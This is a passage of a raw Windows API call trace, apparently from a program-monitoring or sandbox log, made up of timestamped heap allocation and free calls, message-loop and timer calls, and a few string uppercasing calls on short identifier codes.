hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab358 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab370 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab358 | out: hHeap=0x25c0000) returned 1 [0157.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fc8 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fd8 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2028 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1ff8 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2008 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24affc0 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab148 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab130 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab0e8 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aafc8 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaff8 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab160 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1a8 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1d8 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab0d0 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab250 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab208 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab178 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab100 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab268 | out: hHeap=0x25c0000) returned 1 [0157.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1c0 | out: hHeap=0x25c0000) returned 1 [0157.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab238 | out: hHeap=0x25c0000) returned 1 [0157.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab280 | out: hHeap=0x25c0000) returned 1 [0157.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab220 | out: hHeap=0x25c0000) returned 1 [0157.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2f8 | out: hHeap=0x25c0000) returned 1 [0157.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0157.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13b8 | out: hHeap=0x25c0000) returned 1 [0157.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaed8 | out: hHeap=0x25c0000) returned 1 [0157.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0157.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aafb0 | out: hHeap=0x25c0000) returned 1 [0157.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0157.590] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 1 [0157.590] TranslateMessage (lpMsg=0x8bf4b0) returned 0 [0157.590] DispatchMessageW (lpMsg=0x8bf4b0) returned 0x0 [0157.590] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0157.590] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0157.590] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0157.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0157.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13b8 [0157.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0157.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0157.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2008 [0157.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aafb0 [0157.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaed8 [0157.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1ff8 [0157.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2f8 [0157.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1ff8 | out: hHeap=0x25c0000) returned 1 [0157.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2f8 | out: hHeap=0x25c0000) returned 1 [0157.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaed8 | out: hHeap=0x25c0000) returned 1 [0157.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aafb0 | out: hHeap=0x25c0000) returned 1 [0157.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2008 | out: hHeap=0x25c0000) returned 1 [0157.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0157.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0157.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13b8 | out: hHeap=0x25c0000) returned 1 [0157.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0157.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0157.591] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0157.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0157.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0157.591] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0157.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24affc0 | out: hHeap=0x25c0000) returned 1 [0157.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0157.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aafb0 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c18 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaed8 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2f8 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13b8 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab220 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab280 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2008 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab238 [0157.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2008 | out: hHeap=0x25c0000) returned 1 [0157.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab238 | out: hHeap=0x25c0000) returned 1 [0157.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab280 | out: hHeap=0x25c0000) returned 1 [0157.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab220 | out: hHeap=0x25c0000) returned 1 [0157.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0157.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13b8 | out: hHeap=0x25c0000) returned 1 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab220 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24affc0 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab280 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13b8 [0157.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab280 | out: hHeap=0x25c0000) returned 1 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4668 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab280 [0157.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0157.592] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0157.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f28 [0157.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2008 [0157.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab238 [0157.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1c0 [0157.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1ff8 [0157.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab268 [0157.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1ff8 | out: hHeap=0x25c0000) returned 1 [0157.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1ff8 [0157.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4618 [0157.593] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0157.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4618 | out: hHeap=0x25c0000) returned 1 [0157.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1ff8 | out: hHeap=0x25c0000) returned 1 [0157.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab268 | out: hHeap=0x25c0000) returned 1 [0157.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1c0 | out: hHeap=0x25c0000) returned 1 [0157.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab238 | out: hHeap=0x25c0000) returned 1 [0157.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2008 | out: hHeap=0x25c0000) returned 1 [0157.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1f28 | out: hHeap=0x25c0000) returned 1 [0157.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0157.593] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0157.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab238 [0157.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1f28 [0157.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab238 | out: hHeap=0x25c0000) returned 1 [0157.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4618 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab238 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1c0 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2008 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4640 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab268 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1ff8 [0157.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab268 | out: hHeap=0x25c0000) returned 1 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b46e0 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab268 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab100 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2028 [0157.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab238 | out: hHeap=0x25c0000) returned 1 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4708 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fd8 [0157.594] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4708 | out: hHeap=0x25c0000) returned 1 [0157.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fd8 | out: hHeap=0x25c0000) returned 1 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab238 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1fd8 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab178 [0157.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab208 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1fc8 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2068 [0157.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab250 [0157.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fc8 | out: hHeap=0x25c0000) returned 1 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab0d0 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4708 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1d8 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fc8 [0157.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1d8 | out: hHeap=0x25c0000) returned 1 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4730 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1d8 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1a8 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0157.595] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab160 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2068 [0157.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab160 | out: hHeap=0x25c0000) returned 1 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4758 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab160 [0157.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaff8 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2038 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4780 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aafc8 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fa8 [0157.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aafc8 | out: hHeap=0x25c0000) returned 1 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b47a8 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aafc8 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0157.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4758 | out: hHeap=0x25c0000) returned 1 [0157.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0157.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab160 | out: hHeap=0x25c0000) returned 1 [0157.596] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4758 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab160 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2068 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab0e8 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2048 [0157.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2048 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab130 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab148 [0157.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2078 [0157.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0157.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0157.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0157.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab148 | out: hHeap=0x25c0000) returned 1 [0157.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab130 | out: hHeap=0x25c0000) returned 1 [0157.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0157.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2048 [0157.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0157.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0157.597] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2048 [0157.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab130 [0157.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab148 [0157.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2078 [0157.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0157.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab358 [0157.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0157.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab370 [0157.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab388 [0157.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2098 [0157.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab3a0 [0157.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2098 | out: hHeap=0x25c0000) returned 1 [0157.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab3b8 [0157.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2098 [0157.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2098 | out: hHeap=0x25c0000) returned 1 [0157.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab3d0 [0157.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2098 [0157.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2098 | out: hHeap=0x25c0000) returned 1 [0157.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab3e8 [0157.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2098 [0157.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab400 [0157.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3a0 | out: hHeap=0x25c0000) returned 1 [0157.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab388 | out: hHeap=0x25c0000) returned 1 [0157.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3b8 | out: hHeap=0x25c0000) returned 1 [0157.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3d0 | out: hHeap=0x25c0000) returned 1 [0157.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab370 | out: hHeap=0x25c0000) returned 1 [0157.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0157.598] lstrlenW (lpString="20") returned 2 [0157.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3e8 | out: hHeap=0x25c0000) returned 1 [0157.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2098 | out: hHeap=0x25c0000) returned 1 [0157.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab400 | out: hHeap=0x25c0000) returned 1 [0157.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab358 | out: hHeap=0x25c0000) returned 1 [0157.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2b0 | out: hHeap=0x25c0000) returned 1 [0157.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0157.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0157.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab358 [0157.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2078 [0157.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab148 | out: hHeap=0x25c0000) returned 1 [0157.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab130 | out: hHeap=0x25c0000) returned 1 [0157.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0157.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab358 | out: hHeap=0x25c0000) returned 1 [0157.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: 